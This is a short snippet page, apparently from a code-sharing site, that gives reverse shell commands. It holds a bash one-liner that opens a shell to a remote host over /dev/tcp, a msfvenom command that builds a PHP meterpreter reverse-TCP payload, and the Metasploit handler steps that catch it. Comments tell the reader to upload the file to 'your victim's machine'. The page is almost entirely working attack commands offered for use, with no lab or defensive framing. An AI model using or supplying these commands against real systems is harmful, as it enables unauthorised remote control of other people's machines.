reverse shell bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
reverse shell bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
msfvenom php reverse shell
##This will create the payload file "shell.php" with your ip and port.
msfvenom -p php/meterpreter/reverse_tcp LHOST=<$LOCAL_IP> LPORT=<$LOCAL_PORT> -f raw -o shell.php
##You can always "nano" the file to change your ipaddr and port incase you messed up the first step.
#Run 'msfconsole' to start the listener then run the following command.
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
#set your ipaddr
set LHOST <$LOCAL_IP>
#set your listening port
set LPORT <$LOCAL_PORT>
#"show options" to check ur steps then run the command "exploit"
exploit #this will start the listener
#Upload "shell.php" to your victim's machine.
#The victim's machine will need to run the file to connect back to your machine.
Copyright © 2021 Codeinu
Forgot your account's password or having trouble logging into your Account? Don't worry, we'll help you to get back your account. Enter your email address and we'll send you a recovery link to reset your password. If you are experiencing problems resetting your password contact us